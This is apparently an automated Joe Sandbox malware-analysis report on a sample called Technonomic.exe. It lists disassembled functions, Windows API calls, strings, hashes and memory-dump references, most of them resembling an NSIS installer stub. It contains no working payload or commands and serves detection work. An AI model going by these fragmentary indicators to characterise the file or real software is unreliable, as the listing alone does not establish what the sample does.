Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Function 0040427C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
Instruction ID: 7863800e542b6cbc8ec812c2a21dbba0b6cde8a84852b126545aa60b8f7f929b
Opcode Fuzzy Hash: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
Instruction Fuzzy Hash: 13B01235285A00FBDE214B00EE09F457E62F76CB01F008478B340240F0CAB300B1DF19

Function 00404269 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404041), ref: 00404273

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
Instruction ID: 08295bde0fd8e02eb16c20732bdcb1eb6333efd9321479dd2e2322931d05c33c
Opcode Fuzzy Hash: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
Instruction Fuzzy Hash: ADA001B6644500ABCE129F90EF49D0ABB72EBE4B02B518579A285900348A365961FB59

Non-executed Functions

Function 00404C5E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C76
GetDlgItem.USER32(?,00000408), ref: 00404C81
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCB
LoadBitmapW.USER32(0000006E), ref: 00404CDE
SetWindowLongW.USER32(?,000000FC,00405256), ref: 00404CF7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D1D
SendMessageW.USER32(?,00001109,00000002), ref: 00404D33
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3F
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D51
DeleteObject.GDI32(00000000), ref: 00404D54
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E21
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E4C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E60
GetWindowLongW.USER32(?,000000F0), ref: 00404E8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E9D
ShowWindow.USER32(?,00000005), ref: 00404EAE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405010
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405025
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405049
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405069
ImageList_Destroy.COMCTL32(?), ref: 0040507E
GlobalFree.KERNEL32(?), ref: 0040508E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405107
SendMessageW.USER32(?,00001102,?,?), ref: 004051B0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BF
InvalidateRect.USER32(?,00000000,00000001), ref: 004051DF
ShowWindow.USER32(?,00000000), ref: 0040522D
GetDlgItem.USER32(?,000003FE), ref: 00405238
ShowWindow.USER32(00000000), ref: 0040523F

Strings

M, xrefs: 00404E08
N, xrefs: 00404EE9
, xrefs: 00405217

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
Instruction ID: 46f3c2dfcfe7d78df06ebec09318e15d32e2b04993d9507e8b01d99ed80ca2ca
Opcode Fuzzy Hash: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
Instruction Fuzzy Hash: CA026EB0A00209AFDF209F65DD45AAE7BB5FB44314F10817AF610BA2E1C7799E52CF58

Function 004046E2 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404731
SetWindowTextW.USER32(00000000,?), ref: 0040475B
SHBrowseForFolderW.SHELL32(?), ref: 0040480C
CoTaskMemFree.OLE32(00000000), ref: 00404817
lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404849
lstrcatW.KERNEL32(?,: Completed), ref: 00404855
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404867

Part of subcall function 004058AC: GetDlgItemTextW.USER32(?,?,00000400,0040489E), ref: 004058BF

Part of subcall function 00406417: CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\Technonomic.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
Part of subcall function 00406417: CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
Part of subcall function 00406417: CharNextW.USER32(0040A230,"C:\Users\user\Desktop\Technonomic.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
Part of subcall function 00406417: CharPrevW.USER32(0040A230,0040A230,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 0040492A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404945

Part of subcall function 00404A9E: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
Part of subcall function 00404A9E: wsprintfW.USER32 ref: 00404B48
Part of subcall function 00404A9E: SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B

Strings

C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00404832
A, xrefs: 00404805
H7B, xrefs: 004047DF
: Completed, xrefs: 00404843, 00404848, 00404853

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\magmaet\clenched$H7B
API String ID: 2624150263-1828903364
Opcode ID: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
Instruction ID: 9c6f5067bad78934a321292c7affeb857c6c8b78ef178650078e6910c23b8850
Opcode Fuzzy Hash: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
Instruction Fuzzy Hash: D8A183F1A00208ABDF11AFA5CD45AAFB7B8EF84314F10843BF611B62D1D77C99418B69

Function 004043E4 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404482
GetDlgItem.USER32(?,000003E8), ref: 00404496
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044B3
GetSysColor.USER32(?), ref: 004044C4
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044D2
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044E0
lstrlenW.KERNEL32(?), ref: 004044E5
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044F2
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404507
GetDlgItem.USER32(?,0000040A), ref: 00404560
SendMessageW.USER32(00000000), ref: 00404567
GetDlgItem.USER32(?,000003E8), ref: 00404592
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D5
LoadCursorW.USER32(00000000,00007F02), ref: 004045E3
SetCursor.USER32(00000000), ref: 004045E6
ShellExecuteW.SHELL32(0000070B,open,00428200,00000000,00000000,00000001), ref: 004045FB
LoadCursorW.USER32(00000000,00007F00), ref: 00404607
SetCursor.USER32(00000000), ref: 0040460A
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404639
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464B

Strings

N, xrefs: 00404580
open, xrefs: 004045F3
[C@, xrefs: 004045F0
: Completed, xrefs: 004045C1

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$N$[C@$open
API String ID: 3615053054-3308546834
Opcode ID: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
Instruction ID: 197425fdc48522821a3d1a28f7e64f0f4dcf149373df3ed1280bb5b235060fa2
Opcode Fuzzy Hash: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
Instruction Fuzzy Hash: D471A4B1A00209FFDB109F60DD85E6A7B69FB84344F00453AFA05B62E0D7799D51CFA9

Function 00405EB2 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00426DE8,NUL,?,00000000,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EC1
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EE5
GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00405EEE

Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF

GetShortPathNameW.KERNEL32(uB,004275E8,00000400), ref: 00405F0B
wsprintfA.USER32 ref: 00405F29
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?), ref: 00405F64
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F73
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAB
SetFilePointer.KERNEL32(0040A5A8,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5A8,00000000,[Rename],00000000,00000000,00000000), ref: 00406001
GlobalFree.KERNEL32(00000000), ref: 00406012
CloseHandle.KERNEL32(00000000), ref: 00406019

Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\Technonomic.exe,80000000,00000003), ref: 00405D5C
Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

Strings

[Rename], xrefs: 00405F93, 00405FA5
%ls=%ls, xrefs: 00405F1F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405EB2
NUL, xrefs: 00405EBB
uB, xrefs: 00405F00
uB, xrefs: 00405F07
mB, xrefs: 00405EB6

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$Error writing temporary file. Make sure your temp folder is valid.$NUL$[Rename]$mB$uB$uB
API String ID: 222337774-3510403337
Opcode ID: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
Instruction ID: e0a3a616164006467439f71a5ee21b177f06bf99c86c19659b49dd792d0ed9da
Opcode Fuzzy Hash: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
Instruction Fuzzy Hash: 52312230241B157BD2206B618D09F6B3A5CEF85755F25003BFA42F62D2DA3CD9118ABD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
Instruction ID: e4307af7b63af3c060521be2e9f36853b9854247f946bef182d968856dcca5c3
Opcode Fuzzy Hash: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
Instruction Fuzzy Hash: BB418B71800209AFCF058FA5DE459AFBBB9FF45310F00842EF991AA1A0C738DA55DFA4

Function 00406417 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\Technonomic.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
CharNextW.USER32(0040A230,"C:\Users\user\Desktop\Technonomic.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
CharPrevW.USER32(0040A230,0040A230,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1

Strings

*?|<>/":, xrefs: 00406469
"C:\Users\user\Desktop\Technonomic.exe", xrefs: 0040645B
C:\Users\user\AppData\Local\Temp\, xrefs: 00406418

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Technonomic.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1243461662
Opcode ID: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
Instruction ID: 97757fea8cfc4e5e160e398f5921a23c68bb92f937fa9eb531f0d47839a376ba
Opcode Fuzzy Hash: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
Instruction Fuzzy Hash: AE11941580171299DB307B189C80AB762F8EF94760F56843FED8AB32C0E77D5C9286BD

Function 004042AE Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004042CB
GetSysColor.USER32(00000000), ref: 004042E7
SetTextColor.GDI32(?,00000000), ref: 004042F3
SetBkMode.GDI32(?,?), ref: 004042FF
GetSysColor.USER32(?), ref: 00404312
SetBkColor.GDI32(?,?), ref: 00404322
DeleteObject.GDI32(?), ref: 0040433C
CreateBrushIndirect.GDI32(?), ref: 00404346

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: c8c0c82dcd415c8ab494bd2ee85d05619b55063599498dccf98d91aa8dec70c5
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: 9C2154B15007449BC7219F68DE08B5B7BF8AF81714F08892DFD95E26A0D734E948CB54

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
